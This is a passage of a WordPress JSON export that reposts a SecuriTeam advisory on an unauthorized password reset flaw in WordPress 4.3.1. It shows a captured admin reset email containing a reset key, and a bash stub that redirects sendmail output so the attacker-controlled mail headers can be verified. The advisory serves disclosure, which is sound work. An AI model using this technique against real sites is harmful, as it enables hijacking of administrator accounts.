class=\"crayon-v\">MIME<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Version<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">plain<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">charset<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">UTF<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-11\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Transfer<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8bit<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-14\"><span class=\"crayon-e\">Someone <\/span><span class=\"crayon-e\">requested <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">password <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">reset <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">following <\/span><span class=\"crayon-v\">account<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-16\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/companyX-wp\/wp\/wordpress\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-18\"><span class=\"crayon-v\">Username<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">admin<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-20\"><span class=\"crayon-st\">If<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">was<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mistake<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">just <\/span><span class=\"crayon-e\">ignore <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">email <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nothing <\/span><span class=\"crayon-e\">will <\/span><span class=\"crayon-v\">happen<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-22\"><span class=\"crayon-st\">To<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">reset <\/span><span class=\"crayon-e\">your <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">visit <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">following <\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-24\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/companyX-wp\/wp\/wordpress\/wp-login.php?action=rp&amp;key=AceiMFmkMR4fsmwxIZtZ&amp;login=admin&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79da949265461-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79da949265461-26\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0029 seconds] -->  <\/p>\n<p>This can be quickly verified by replacing <em>\/usr\/sbin\/sendmail<\/em> with a bash script (with chmod +x ,bit set):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590ba8e0a79dd754293484\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/bin\/bash  cat &gt; \/tmp\/outgoing-email<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590ba8e0a79dd754293484-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-590ba8e0a79dd754293484-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590ba8e0a79dd754293484-1\"><span class=\"crayon-p\">#!\/bin\/bash<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590ba8e0a79dd754293484-2\"><span class=\"crayon-v\">cat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">outgoing<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">email<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>As we can see, fields Return-Path, From, and Message-ID, all have the attacker&#8217;s domain set.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3176\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Wed, 03 May 2017 13:09:31 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describe Unauthorized Password Reset vulnerability found in WordPress version 4.3.1. WordPress is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time. The core software is built by hundreds of community volunteers, and &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3176\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 WordPress Unauthorized Password Reset<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12179,10757],"class_list":["post-7540","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-origin-validation-error","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7540","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7540"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7540\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7540"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7540"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}